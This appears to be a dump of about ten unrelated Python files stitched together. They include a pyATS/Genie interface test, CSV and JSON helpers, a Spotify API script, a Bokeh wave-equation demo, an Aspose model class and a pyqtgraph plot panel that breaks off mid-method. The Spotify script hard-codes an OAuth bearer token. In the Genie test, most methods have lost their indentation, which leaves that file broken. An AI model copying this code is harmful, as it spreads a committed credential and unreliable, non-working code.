        points = generatePoints(int(userInput))
        writeFile(points)
    elif(os.path.isfile(userInput)):
        points = readFile(userInput)
    else:
        print 'Invalid input: File does not exist or input is not a number'
        exit()
    print ''
    doNearestNeighbor(points)
    print ''
    doExhaustiveSearch(points)
main()
|
# Python
import unittest
from copy import deepcopy
from unittest.mock import Mock
# ATS
from pyats.topology import Device
# Genie
from genie.libs.ops.interface.iosxr.interface import Interface
from genie.libs.ops.interface.iosxr.tests.interface_output import InterfaceOutput
# nxos show_interface
from genie.libs.parser.iosxr.show_interface import ShowInterfacesDetail, \
ShowEthernetTags, \
ShowIpv4VrfAllInterface, \
ShowIpv6VrfAllInterface, \
ShowInterfacesAccounting
from genie.libs.parser.iosxr.show_vrf import ShowVrfAllDetail
# Canned CLI outputs keyed by the exact command string.  mapper() is wired
# into the mocked device.execute so parsers run against this fixture data.
outputs = {}
outputs[
    'show interface GigabitEthernet0/0/0/1 detail'] = \
    InterfaceOutput.ShowInterfacesDetail_gi1
outputs[
    'show interfaces GigabitEthernet0/0/0/1 accounting'] = \
    InterfaceOutput.ShowInterfacesAccounting_gi1
outputs['show ethernet tags GigabitEthernet0/0/0/1'] = InterfaceOutput.ShowEthernetTag_gi1
outputs['show ethernet tags'] = InterfaceOutput.ShowEthernetTags_all
outputs['show vrf VRF1 detail'] = InterfaceOutput.ShowVrfAllDetail_vrf1
outputs['show ipv4 vrf VRF1 interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_vrf1
outputs['show ipv6 vrf VRF1 interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_vrf1
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
outputs['show ipv6 vrf all interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_all
outputs['show ipv6 vrf VRF1 interface GigabitEthernet0/0/0/1'] = InterfaceOutput.ShowIpv6VrfAllInterface_gi1
outputs['show vrf all detail'] = InterfaceOutput.ShowVrfAllDetail_all
outputs['show interfaces accounting'] = InterfaceOutput.ShowInterfacesAccounting_all
def mapper(key):
    # Stand-in for device.execute: return the fixture for this command.
    return outputs[key]
class test_interface(unittest.TestCase):
    def setUp(self):
        """Build a fake iosxr device whose CLI connection is the device
        itself, so execute() can be mocked per test."""
        self.device = Device(name='aDevice')
        self.device.os = 'iosxr'
        self.device.mapping = {}
        self.device.mapping['cli'] = 'cli'
        # Give the device as a connection type
        # This is done in order to call the parser on the output provided
        self.device.connectionmgr.connections['cli'] = self.device
    def test_complete_output(self):
        """learn() with the full fixture set must equal the golden ops dict."""
        self.maxDiff = None
        intf = Interface(device=self.device)
        # Get outputs
        intf.maker.outputs[ShowInterfacesDetail] = \
            {"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
        intf.maker.outputs[ShowEthernetTags] = \
            {"{'interface':''}": InterfaceOutput.ShowEthernetTags}
        intf.maker.outputs[ShowVrfAllDetail] = \
            {"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
        intf.maker.outputs[ShowInterfacesAccounting] = \
            {"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
        self.device.execute = Mock()
        self.device.execute.side_effect = mapper
        # Learn the feature
        intf.learn()
        # Verify Ops was created successfully
        self.assertDictEqual(intf.info, InterfaceOutput.InterfaceOpsOutput_info)
def test_empty_output(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = {"{'interface':''}": ''}
intf.maker.outputs[ShowIpv4VrfAllInterface] = {"{'vrf':None,'interface':''}": ''}
intf.maker.outputs[ShowIpv6VrfAllInterface] = {"{'vrf':None,'interface':''}": ''}
intf.maker.outputs[ShowVrfAllDetail] = {"{'vrf':''}": ''}
intf.maker.outputs[ShowEthernetTags] = {"{'interface':''}": ''}
intf.maker.outputs[ShowInterfacesAccounting] = {"{'interface':''}": ''}
outputs['show ipv4 vrf all interface'] = ''
outputs['show ipv6 vrf all interface'] = ''
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Check no attribute not found
# info - vrf
with self.assertRaises(AttributeError):
vrf = (intf.info['MgmtEth0/0/CPU0/0']['type'])
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
outputs['show ipv6 vrf all interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_all
def test_custom_output(self):
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowIpv4VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv4VrfAllInterface}
intf.maker.outputs[ShowIpv6VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv6VrfAllInterface}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn(interface='GigabitEthernet0/0/0/1', address_family='ipv6', vrf='VRF1')
self.maxDiff = None
# Verify Ops was created successfully
self.assertDictEqual(intf.info, InterfaceOutput.interfaceOpsOutput_custom_info)
def test_selective_attribute(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
intf.maker.outputs[ShowEthernetTags] = \
{"{'interface':''}": InterfaceOutput.ShowEthernetTags}
intf.maker.outputs[ShowIpv4VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv4VrfAllInterface}
intf.maker.outputs[ShowIpv6VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv6VrfAllInterface}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
intf.maker.outputs[ShowInterfacesAccounting] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Check specific attribute values
# info - type
self.assertEqual(intf.info['MgmtEth0/0/CPU0/0']['type'], 'Management Ethernet')
def test_incomplete_output(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
intf.maker.outputs[ShowEthernetTags] = \
{"{'interface':''}": InterfaceOutput.ShowEthernetTags}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
intf.maker.outputs[ShowInterfacesAccounting] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
outputs['show ipv4 vrf all interface'] = ''
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Delete missing specific attribute values
expect_dict = deepcopy(InterfaceOutput.InterfaceOpsOutput_info)
del (expect_dict['GigabitEthernet0/0/0/0']['ipv4'])
del (expect_dict['GigabitEthernet0/0/0/1']['ipv4'])
# Verify Ops was created successfully
self.assertEqual(intf.info, expect_dict)
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
import csv
import numpy
import logging
import json
def is_number(input):
    """
    Check whether *input* can be interpreted as a real number.

    :param input: value to validate (typically one CSV field)
    :return: True if the value converts to float, False otherwise
        (a warning is logged for bad data)
    """
    try:
        float(input)
    except (ValueError, TypeError):
        # TypeError covers non-convertible objects such as None, which
        # float() rejects with TypeError rather than ValueError; the
        # original crashed on those instead of reporting bad data.
        logging.warning('Dataset contains non-real or non-numerical values.')
        return False
    # float() can only ever produce a real value, so the former
    # numpy.isreal() check (and its unreachable ValueError) was redundant.
    return True
def read_data(filename):
    """Read time/voltage pairs from a two-column CSV file.

    Rows whose first two fields are not both numeric are skipped (with a
    warning logged by is_number), which keeps the two output lists the
    same length. Blank or single-field rows are skipped too, where the
    original raised IndexError.

    :param filename: input file name
    :return: (time, voltage) lists of floats
    :raises OSError: if the file cannot be opened
    """
    time = []
    voltage = []
    # "with" guarantees the handle is closed even if parsing fails; the
    # original opened the file and never closed it.
    with open(filename, 'r') as file:
        temp = csv.reader(file, delimiter=',')
        for row in temp:
            if len(row) >= 2 and is_number(row[0]) and is_number(row[1]):
                time.append(float(row[0]))
                voltage.append(float(row[1]))
    return time, voltage
def write_json(filename, info):
    """Write data to a .json file named after the input CSV.

    :param filename: source filename; its '.csv' suffix is replaced by '.json'
    :param info: dictionary containing the data to write
    :return: None
    """
    json_filename = filename.replace('.csv', '.json')
    # The original called ``json_file.close`` without parentheses, so the
    # handle was never actually closed; the context manager fixes the leak.
    with open(json_filename, "w") as json_file:
        json.dump(info, json_file)
    return
# def main():
# try:
# xtime, xvoltage = read_data('./test1.csv')
# except IOError:
# print('main: File not Found')
# return
# print(xtime)
# print(xvoltage)
#
# print(is_number('FIVE'))
# if __name__ == "__main__":
# main()
|
import requests
import billboard_miner
# SECURITY: hard-coded OAuth bearer token committed to source control.
# Spotify tokens expire quickly; this should come from the environment or a
# config file kept out of version control.
api_token = "Bearer BQB7Ojx2hlfuMpAJkVExFA5hdcfv1MR1k_jp7qUE_Np142Y40k-j-Ed8Cs7eeNKIp0bU0t7BzoxrqSYsoYNGqtVXE06bgW2VjHyEy5VGvKk6pN1n5kN8wzgRb7zoSLJuo3gOHn-rALAMayM-vPg"
def getSongIds(song_list):
    """Resolve a list of songs to Spotify track IDs via the search API.

    :param song_list: list of dicts with "artist" and "song_name" keys
    :return: list of Spotify track ID strings; songs that fail to download
        or return no match are skipped with a message printed
    """
    base_url = "https://api.spotify.com/v1/search"
    headers = {"Authorization": api_token}
    id_list = []
    for song in song_list:
        song_name = song["song_name"].replace(" ", "+")
        query_string = "%s %s" % (song["artist"], song_name)
        query = {"q": query_string, "type": "track", "limit": 1}
        r = requests.get(base_url, params=query, headers=headers)
        if r.status_code != requests.codes.ok:
            print("Failed to Download Track: %s" % song["song_name"])
            print("Failed with Error Code: %d" % r.status_code)
        else:
            items = r.json()["tracks"]["items"]
            # Guard against an empty result set instead of raising IndexError.
            if not items:
                print("No Spotify match for: %s" % song["song_name"])
                continue
            # The original also built an unused artist list here, shadowing
            # the outer loop variable in the process; both removed.
            id_list.append(items[0]["id"])
    return id_list
def getSongPopularity(ids):
    """Fetch title, popularity and artist names for each Spotify track ID.

    :param ids: iterable of Spotify track ID strings
    :return: list of dicts with "title", "popularity" and "artists" keys;
        tracks that fail to download are skipped with a message printed
    """
    # ids = ['11dFghVXANMlKmJXsNCbNl', '11dFghVXANMlKmJXsNCbNl']
    base_url = "https://api.spotify.com/v1/tracks/"
    headers = {"Authorization": api_token}
    song_list = []
    for i in ids:
        url = base_url + i
        r = requests.get(url, headers=headers)
        if r.status_code != requests.codes.ok:
            print("Failed to Download Track: ID %s" % i)
            print("Failed with Error Code: %d" % r.status_code)
        else:
            # NOTE(review): local name shadows any "json" module import.
            json = r.json()
            song_dict = {}
            song_dict["title"] = json["name"]
            song_dict["popularity"] = json["popularity"]
            artist_list = []
            for x in json["artists"]:
                artist_list.append(x["name"])
            song_dict["artists"] = artist_list
            song_list.append(song_dict)
    return song_list
# Demo run (requires network access): scrape the 2015 year-end rap chart,
# then resolve one known track and print its popularity data.
songs = billboard_miner.miner("https://www.billboard.com/charts/year-end/2015/hot-rap-songs")
print(songs)
temp = [{"artist": "drake", "song_name": "hotline bling"}]
id_list = getSongIds(temp)
print(getSongPopularity(id_list))
|
import numpy as np
from bokeh.io import curdoc
from bokeh.layouts import Row, WidgetBox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import Slider, RadioButtonGroup, Toggle
from bokeh.plotting import Figure
"""
This plot visualizes how waves propagate by simulating the right-going and
left-going wave. The user can choose the initial condition, which will determine
the shape of both waves.
An advanced option is used to enable the initial condition on the first
derivative with respect to time.
"""
# Define sizing constants for the plot to neatly fit in the website
HEIGHT = 400
WIDTH_PLOT = 600
# NOTE(review): name is a typo for WIDTH_TOTAL; kept because it is
# referenced at the bottom of this file.
WIDTH_TOAL = 800
# Left-most and right-most point for value pairs to still be calculated
LEFT_X = -10
RIGHT_X = 10
LINE_WIDTH = 2
# The zeroth initial condition (elongation at time zero)
INIT_0_1_indicator = "Glocke"
def INIT_0_1(x):
    # Gaussian bell curve.
    return np.exp(-x**2)
INIT_0_2_indicator = "Hütchen"
def INIT_0_2(x):
    # Triangular "hat": ramps up on (-1, 0), down on (0, 1), zero elsewhere.
    return np.piecewise(x,
        [x<-1, (-1 <= x) & (x < 0), (0 <= x) & (x < 1), 1<=x],
        [0, lambda ele: ele+1, lambda ele: -ele+1, 0])
indicators_0 = [INIT_0_1_indicator, INIT_0_2_indicator, ]
initials_0 = [INIT_0_1, INIT_0_2, ]
# The first initial condition (velocity/momentum at time zero).
# NOTE: the *_integrated functions are antiderivatives of the u_1 conditions
# named in the indicator strings; update_data() evaluates them at the
# integral bounds.
INIT_1_1_indicator = "1/(1+e^(-x)) - 0,5"
def INIT_1_1_integrated(x):
    return 0.5*x + np.log(1 + np.exp(-x))
INIT_1_2_indicator = "1"
def INIT_1_2_integrated(x):
    return x
INIT_1_3_indicator = "x, x in (-1, 1)"
def INIT_1_3_integrated(x):
    """Continuous antiderivative of u_1(l) = l on (-1, 1), 0 elsewhere.

    The original returned 0.5*x**2 on (-1, 1) next to 0 outside, which is
    discontinuous at x = +-1 and therefore not a valid antiderivative when
    the integration interval crosses those points. Shifting the middle
    piece by the constant -0.5 makes all pieces join continuously without
    changing the derivative, so evaluated differences stay correct.
    """
    return np.piecewise(x,
        [x < -1, (-1 <= x) & (x < 1), 1 <= x],
        [0, lambda ele: 0.5 * (ele**2 - 1), 0])
# Lookup tables indexed by the RadioButtonGroup's ``active`` integer.
indicators_1 = [INIT_1_1_indicator, INIT_1_2_indicator, INIT_1_3_indicator]
initials_1_integrated = [INIT_1_1_integrated, INIT_1_2_integrated,
                         INIT_1_3_integrated]
def update_data(init_0_active, speed, scale_0, time, init_1_active, scale_1):
    """
    This function calculates the value pairs for the plotted line to be drawn
    upon. It uses d'Alembert's general solution to the wave propagation
    equation in one dimension:
        u(t,x) = 1/2 * (
            u_0(x + c*t) + u_0(x - c*t) + 1/c * (
                integral from (x - c*t) to (x + c*t) over u_1(l) dl
            )
        )
    The integration of the first (u_1) initial condition is preworked in the
    function pointer list 'initials_1_integrated'. Therefore, we only have to
    evaluate the antiderivative at the upper and lower boundary of the integral.
    We also incorporate a scale to visualize the influence of the initial
    condition:
        u_0 = scale_0 * u_0_original
        u_1 = scale_1 * u_1_original
    """
    x = np.linspace(LEFT_X, RIGHT_X, 200)
    u_left_going = scale_0 * initials_0[init_0_active](x + speed * time)
    u_right_going = scale_0 * initials_0[init_0_active](x - speed * time)
    U_momentum_left_going = scale_1 *\
        initials_1_integrated[init_1_active](x + speed * time)
    U_momentum_right_going = scale_1 *\
        initials_1_integrated[init_1_active](x - speed * time)
    u = 0.5 * (
        u_left_going + u_right_going +
        1/speed * (
            U_momentum_left_going - U_momentum_right_going
        ))
    return x, u
# The ColumnDataSource abstracts the transmission of data to the client over the
# Websocket Protocol. Whenever its data member variable is updated the new
# information is sent to be displayed.
data_source = ColumnDataSource(data={'x': [], 'y': []})
plot = Figure(plot_height=HEIGHT, plot_width=WIDTH_PLOT, x_range=[-5, 5],
              y_range=[-0.5, 2.5])
plot.line("x", "y", source=data_source, color="blue", line_width=LINE_WIDTH)
# Select the zeroth initial condition
init_0_selector = RadioButtonGroup(labels=indicators_0, active=0)
# Select the speed at which the wave propagates
speed = Slider(title="Ausbreitungsgeschwindigkeit", start=0.1, end=2, step=0.1,
               value=1)
# Manipulate the influence of the zeroth initial condition
scale_0 = Slider(title="Skalierung der 1. Anfangsbedingung", start=0.1, end=2,
                 step=0.1, value=1)
# Toggle that adds a periodic callback function, so that the plot seems to be
# moving
animation_toggle = Toggle(label="Animieren")
# Lets the user adjust the time in the transient simulation on its own
time = Slider(title="Zeit", value=0, start=0, end=10, step=0.1)
# Allow the initial speed to be considered (This is deactivated up front since
# the behaviour might seem slightly unphysical)
advanced_toggle = Toggle(label="Zweite Anfangsbedingung aktivieren")
# Select the type of the first initial condition
init_1_selector = RadioButtonGroup(labels=indicators_1, active=0, visible=False)
# Manipulate the influence of the first initial condition
scale_1 = Slider(title="Skalierung der 2. Anfangsbedingung", start=0, end=2,
                 step=0.1, value=0, visible=False)
def animate():
    """Advance the time slider by one step, wrapping back to the start."""
    at_end = time.value >= time.end
    time.value = time.start if at_end else time.value + time.step
# Handle of the currently registered periodic callback (0 = none yet).
callback_id = 0
def animation_callback(source):
    """
    Function adds a callback to the function which animates it. The callback_id
    is the id of the process the bokeh server spawns. It is necessary to
    remove it later on.
    """
    global callback_id
    if animation_toggle.active == 1:
        callback_id = curdoc().add_periodic_callback(animate, 100)
    else:
        # NOTE(review): if the toggle is switched off before ever being
        # switched on, this removes the placeholder id 0 — confirm bokeh
        # tolerates that.
        curdoc().remove_periodic_callback(callback_id)
def toggle_callback(source):
    """
    Reveal the 'advanced' widgets for the second initial condition and hide
    the activating toggle, so users only see them after opting in.
    """
    advanced_toggle.visible = False
    for widget in (init_1_selector, scale_1):
        widget.visible = True
    # Set the time back to 0 so that solution stays in the viewport
    time.value = 0
    scale_1.value = 0.2
def slider_callback(attr, old, new):
    """
    Whenever a slider value changes, the value pairs for the plot are
    recalculated and sent to the client by updating the data member variable of
    the data_source object. (The attr/old/new arguments required by bokeh's
    on_change signature are not used.)
    """
    x, u = update_data(init_0_selector.active, speed.value, scale_0.value,
                       time.value, init_1_selector.active, scale_1.value)
    data_source.data = {'x': x, 'y': u}
def init_0_selector_callback(source):
    # Reset the scale so a newly chosen u_0 shape starts unscaled, then redraw.
    scale_0.value = 1
    slider_callback(0, 0, 0)
def init_1_selector_callback(source):
    # Reset the scale to the small default used for u_1, then redraw.
    scale_1.value = 0.2
    slider_callback(0, 0, 0)
# Call callback once upfront to populate the plot
slider_callback(0,0,0)
# Connect the widgets with their respective callbacks
animation_toggle.on_click(animation_callback)
advanced_toggle.on_click(toggle_callback)
for slider in (speed, scale_0, time, scale_1):
    slider.on_change("value", slider_callback)
init_0_selector.on_click(init_0_selector_callback)
init_1_selector.on_click(init_1_selector_callback)
# Assemble the plot: the graph on the left, all controls stacked on the right.
inputs = WidgetBox(init_0_selector, speed, scale_0, animation_toggle, time,
                   advanced_toggle, init_1_selector, scale_1)
curdoc().add_root(Row(plot, inputs, width=WIDTH_TOAL))
|
from collections import Counter
from typing import List
class Solution:
    def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:
        """Return the most frequent word of *paragraph* not in *banned*.

        Comparison is case-insensitive; the listed punctuation marks act
        as word separators. Returns None if every word is banned.
        """
        punctuation = "!?',;."
        # Replace punctuation with spaces so split() separates the words.
        cleansed = ''.join(' ' if ch in punctuation else ch for ch in paragraph)
        # O(1) membership tests instead of scanning the banned list each time.
        banned_set = set(banned)
        # most_common() yields words by decreasing frequency, so the first
        # non-banned word is the answer. (Leftover debug print removed.)
        for word, _count in Counter(cleansed.lower().split()).most_common():
            if word not in banned_set:
                return word
|
import webbrowser
import time
# Open the target page time_total times, pausing five seconds before each
# launch. Side effect: every iteration opens a browser tab/window.
time_control = 0
time_total = 3
print('Current Time: '+time.ctime())
while(time_control < time_total):
    time.sleep(5)
    webbrowser.open("http://www.baidu.com")
    time_control += 1
|
# coding: utf-8
# ----------------------------------------------------------------------------
# <copyright company="Aspose" file="AsnEncodedData.py">
# Copyright (c) 2018-2019 Aspose Pty Ltd. All rights reserved.
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# </summary>
# ----------------------------------------------------------------------------
import pprint
import re
import six
from asposecadcloud.models.oid import Oid
class AsnEncodedData(object):
    """AsnEncodedData model (Swagger-generated, Aspose CAD Cloud API)."""
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'oid': 'Oid',
        'raw_data': 'str'
    }
    attribute_map = {
        'oid': 'Oid',
        'raw_data': 'RawData'
    }
    discriminator_value_class_map = {
        'X500DistinguishedName': 'X500DistinguishedName'
    }
    def __init__(self, oid=None, raw_data=None):
        """AsnEncodedData - a model defined in Swagger"""
        super(AsnEncodedData, self).__init__()
        self._oid = None
        self._raw_data = None
        if oid is not None:
            self.oid = oid
        if raw_data is not None:
            self.raw_data = raw_data
    @property
    def oid(self):
        """Gets the oid of this AsnEncodedData.
        :return: The oid of this AsnEncodedData.
        :rtype: Oid
        """
        return self._oid
    @oid.setter
    def oid(self, oid):
        """Sets the oid of this AsnEncodedData.
        :param oid: The oid of this AsnEncodedData.
        :type: Oid
        """
        self._oid = oid
    @property
    def raw_data(self):
        """Gets the raw_data of this AsnEncodedData.
        :return: The raw_data of this AsnEncodedData.
        :rtype: str
        """
        return self._raw_data
    @raw_data.setter
    def raw_data(self, raw_data):
        """Sets the raw_data of this AsnEncodedData.
        :param raw_data: The raw_data of this AsnEncodedData.
        :type: str
        """
        # The pattern accepts standard base64 text (groups of four
        # characters with optional '='/'==' padding) or an empty string.
        if raw_data is not None and not re.search('^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?$', raw_data):
            raise ValueError("Invalid value for `raw_data`, must be a follow pattern or equal to `/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?$/`")
        self._raw_data = raw_data
    def get_real_child_model(self, data):
        """Returns the real base class specified by the discriminator"""
        # NOTE(review): generated code — ``self.discriminator`` is never set
        # on this class, and the map's keys are mixed-case while the lookup
        # lower-cases the value, so this lookup appears unable to match;
        # confirm against the code generator before relying on it.
        discriminator_value = data.get(self.discriminator)
        return self.discriminator_value_class_map.get(discriminator_value.lower()) if discriminator_value else None
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, AsnEncodedData):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
import math

def _count_common_divisors(values):
    """Count the integers >= 2 that divide every element of *values*.

    Matches the original brute force, which only tried candidates up to
    min(values) — so a minimum below 2 (or an empty list) yields 0.
    Every common divisor of the list divides the gcd of the list, so only
    the O(sqrt(g)) divisors of the gcd need checking instead of all
    candidates up to min(values).
    """
    if not values or min(values) < 2:
        return 0
    g = 0
    for value in values:
        g = math.gcd(g, value)
    count = 0
    d = 1
    while d * d <= g:
        if g % d == 0:
            if d >= 2:
                count += 1
            partner = g // d
            if partner != d and partner >= 2:
                count += 1
        d += 1
    return count

# Read n, then n integers (one per line), and print how many integers >= 2
# divide all of them.
n = int(input())
a = [int(input()) for _ in range(n)]
print(_count_common_divisors(a))
|
# -*- coding: utf-8 -*-
from qtgraph_editor import QTGraphWidgetEditor
from traits.api import HasTraits, Int, Str, Instance, Dict, Array
from traitsui.api import Item, View, EnumEditor, HGroup, Label
from instruments.i_instrument import IInstrument
import pyqtgraph as pg
import numpy as np
import logging
logger = logging.getLogger(__name__)
# White background / black foreground for all pyqtgraph widgets.
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
# Rows of samples allocated per chunk of the data array (172800 is
# presumably 48 h of 1 Hz samples — confirm against the acquisition rate).
DATA_LINES = 172800
# One pen colour per output channel, indexed by channel number.
COLOR_MAP = [(255, 63, 0), (0, 63, 255), (63, 255, 0), (255, 255, 63), \
             (255, 63, 255), (63, 255, 255), (160, 0, 0), (0, 0, 160), \
             (0, 160, 0), (0, 160, 160), (160, 160, 0), (160, 0, 160), \
             (255, 160, 160), (160, 160, 255), (160, 255, 160), (0, 0, 63)]
# Maps unit display names to their SI abbreviations for the axis labels.
SI_ACR = {'Voltage': 'V', 'Current': 'A', 'Resistance': u"\u2126", 'Time': 's',
          'SampleNumber': '', 'Capacitance': 'F', 'Frequency': 'Hz', 'BIAS': 'V', 'Temperature': u'\u00B0C',
          'Percent': '%'}
class PlotPanel(HasTraits):
    """Dockable pane that plots measurement channels with pyqtgraph and lets
    the user choose which x/y unit column of the data array is displayed."""
    pane_name = Str('Plot')
    pane_id = Str('sensorscience.unimeas.plot_pane')
    plot_widget = Instance(pg.PlotWidget)
    plots = Dict                 # channel name -> pg.PlotCurveItem
    data = Array                 # row-per-(channel, unit) sample buffer
    x_units = Dict               # int column offset -> unit name
    y_units = Dict               # int column offset -> unit name
    index = Int(0)               # next free sample slot in `data`
    selected_x_unit = Int(0)
    selected_y_unit = Int(0)
    plot_size = Int(DATA_LINES)  # current capacity of `data` along axis 1
    plot_increment = Int         # rows occupied per channel
    legend = Instance(pg.LegendItem)
    instrument = Instance(IInstrument)
    traits_view = View(Item('plot_widget', editor=QTGraphWidgetEditor(), show_label=False),
                       HGroup(Label('y-unit: '), Item('selected_y_unit',
                              editor=EnumEditor(name='y_units'), show_label=False),
                              Label('x-unit: '), Item('selected_x_unit',
                              editor=EnumEditor(name='x_units'), show_label=False)))
    def _plot_widget_default(self):
        """Build the plot widget with crosshair lines, a coordinate label
        pinned to the top-right corner, and a rate-limited mouse tracker."""
        plot = pg.PlotWidget()
        self.vLine = pg.InfiniteLine(angle=90, movable=False, pen=({'color': '90909080', 'width': 1}))
        self.hLine = pg.InfiniteLine(angle=0, movable=False, pen=({'color': '90909080', 'width': 1}))
        plot.addItem(self.vLine, ignoreBounds=True)
        plot.addItem(self.hLine, ignoreBounds=True)
        self.label = pg.TextItem(anchor=(1, 1))
        plot.addItem(self.label)
        self.label.setPos(plot.getPlotItem().getViewBox().viewRect().right(), \
                          plot.getPlotItem().getViewBox().viewRect().top())
        # SignalProxy throttles mouse-move events to at most 60 Hz.
        self.proxy = pg.SignalProxy(plot.scene().sigMouseMoved, rateLimit=60, slot=self.mouse_moved)
        plot.sigRangeChanged.connect(self.range_changed)
        return plot
    def range_changed(self, evt):
        # Keep the coordinate label glued to the view's top-right corner.
        self.label.setPos(self.plot_widget.getPlotItem().getViewBox().viewRect().right(), \
                          self.plot_widget.getPlotItem().getViewBox().viewRect().top())
    def mouse_moved(self, evt):
        """Move the crosshair to the cursor and show its data coordinates."""
        pos = evt[0]  ## using signal proxy turns original arguments into a tuple
        if self.plot_widget.sceneBoundingRect().contains(pos):
            mousePoint = self.plot_widget.getPlotItem().getViewBox().mapSceneToView(pos)
            self.label.setText("x=%0.3e, y=%0.3e" % (mousePoint.x(), mousePoint.y()), color='k')
            self.vLine.setPos(mousePoint.x())
            self.hLine.setPos(mousePoint.y())
    def update_visible_plots(self):
        """Re-add only the curves for channels currently enabled on the
        instrument (legend entries are rebuilt from scratch)."""
        if not hasattr(self.instrument, 'enabled_channels'):
            return
        self.plot_widget.clearPlots()
        for name in [l.text for a, l in self.legend.items]:
            self.legend.removeItem(name)
        for i in range(len(self.instrument.enabled_channels)):
            if self.instrument.enabled_channels[i]:
                self.plot_widget.addItem(self.plots[self.instrument.output_channels[i]])
    def configure_plots(self, instrument):
        """(Re)create curves and the data buffer for *instrument*'s channels."""
        self.instrument = instrument
        if self.legend is None:
            self.legend = self.plot_widget.getPlotItem().addLegend()
        for name in [l.text for a, l in self.legend.items]:
            self.legend.removeItem(name)
        self.plot_widget.enableAutoRange(True, True)
        self.plots = {}
        # One row per channel per unit; DATA_LINES samples of headroom.
        self.data = np.zeros(
            shape=(len(instrument.output_channels) * (len(instrument.x_units) + len(instrument.y_units)), DATA_LINES),
            dtype=np.float32)
        for i in range(len(instrument.output_channels)):
            self.plots[instrument.output_channels[i]] = pg.PlotCurveItem(x=[0], y=[0],
                                                                         pen=({'color': COLOR_MAP[i], 'width': 1}),
                                                                         name=instrument.output_channels[i])
        self.plot_increment = len(instrument.x_units) + len(instrument.y_units)
        self.x_units = instrument.x_units
        self.y_units = instrument.y_units
        self.update_visible_plots()
    def _selected_x_unit_changed(self, unit):
        self.plot_widget.setLabel('bottom', self.x_units[unit], units=SI_ACR.get(self.x_units[unit], unit))
        self.selected_x_unit = unit
        for channel in self.plots.keys():
